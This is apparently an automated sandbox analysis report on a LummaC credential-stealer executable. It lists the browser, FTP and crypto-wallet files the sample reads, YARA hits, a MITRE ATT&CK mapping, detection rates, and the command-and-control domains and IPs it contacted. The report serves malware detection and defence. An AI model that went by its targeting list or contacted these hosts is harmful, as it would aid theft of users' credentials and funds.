Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior

Source: Yara match	File source: 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3872846044.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3868669756.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3868587610.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3858599222.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qnUFsmyxMm.exe PID: 6464, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: qnUFsmyxMm.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: 0.2.qnUFsmyxMm.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qnUFsmyxMm.exe	42%	Virustotal		Browse
qnUFsmyxMm.exe	34%	ReversingLabs	Win32.Trojan.Generic
qnUFsmyxMm.exe	100%	Avira	HEUR/AGEN.1308324

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	51%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://klipjarifaa.shop/-9	0%	Avira URL Cloud	safe
leeryspcieu.click	0%	Avira URL Cloud	safe
https://leeryspcieu.click/U9	0%	Avira URL Cloud	safe
https://klipjarifaa.shop/int_clp_8888.txt	0%	Avira URL Cloud	safe
https://leeryspcieu.click/apiP	0%	Avira URL Cloud	safe
https://klipjarifaa.shop/	0%	Avira URL Cloud	safe
https://klipjarifaa.shop/=9	0%	Avira URL Cloud	safe
https://klipjarifaa.shop/int_clp_8888.txt%	0%	Avira URL Cloud	safe
https://leeryspcieu.click/U:	0%	Avira URL Cloud	safe
https://leeryspcieu.click/api	0%	Avira URL Cloud	safe
https://leeryspcieu.click/	0%	Avira URL Cloud	safe
https://klipjarifaa.shop/int_clp_8888.txth	0%	Avira URL Cloud	safe
https://klipjarifaa.shop/int_clp_8888.txt0sA	0%	Avira URL Cloud	safe
https://leeryspcieu.click/apix	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
leeryspcieu.click	172.67.219.133	true	true		unknown
klipjarifaa.shop	188.114.97.3	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
https://leeryspcieu.click/api	true	Avira URL Cloud: safe	unknown
aspecteirs.lat	false		high
leeryspcieu.click	true	Avira URL Cloud: safe	unknown
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
https://klipjarifaa.shop/int_clp_8888.txt	false	Avira URL Cloud: safe	unknown
energyaffai.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	qnUFsmyxMm.exe, 00000000.00000003.3927008169.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924090719.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923676725.0000000003903000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937503296.0000000003907000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928482811.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926046976.00000000039EF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937004478.0000000003900000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921152302.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923794882.00000000039D8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3925160129.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921309363.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937339896.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926694212.000000000390A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926282396.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924759593.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3938216484.0000000003906000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926797756.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3927226610.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921831161.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3931951681.0000000003A0A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928316241.00000000039F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://certs.securetrust.com/CA0:	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.vikingcloud.com/0A	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/TWGCA.crt0	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.vikingcloud.com/0:	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://leeryspcieu.click/U:	qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://leeryspcieu.click/U9	qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.vikingcloud.com/TWGCA.crl0t	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://certs.securetrust.com/CA05	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://klipjarifaa.shop/-9	qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipjarifaa.shop/int_clp_8888.txt%	qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://certs.securetrust.com/CA0	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://klipjarifaa.shop/=9	qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.trustwave.com/TWGCA.crl0n	qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipjarifaa.shop/	qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/TWGCSCA_L1.crl0y	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://leeryspcieu.click/apiP	qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipjarifaa.shop/int_clp_8888.txt0sA	qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://leeryspcieu.click/apix	qnUFsmyxMm.exe, 00000000.00000003.3853254066.0000000003362000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://leeryspcieu.click/	qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3872774190.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826083750.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826098111.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826000118.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipjarifaa.shop/int_clp_8888.txth	qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.securetrust.com/0?	qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	klipjarifaa.shop	European Union		13335	CLOUDFLARENETUS	false
172.67.219.133	leeryspcieu.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583036
Start date and time:	2025-01-01 16:50:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	qnUFsmyxMm.exe renamed because original name is a hash value
Original Sample Name:	a00f1411626bdf8860a00a2ee9f77709.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@56/10@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 13.85.23.206, 13.107.246.45
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ColorStreamLib.exe, PID 3940 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:53:56	API Interceptor	8x Sleep call for process: qnUFsmyxMm.exe modified
10:55:00	API Interceptor	1x Sleep call for process: ColorStreamLib.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
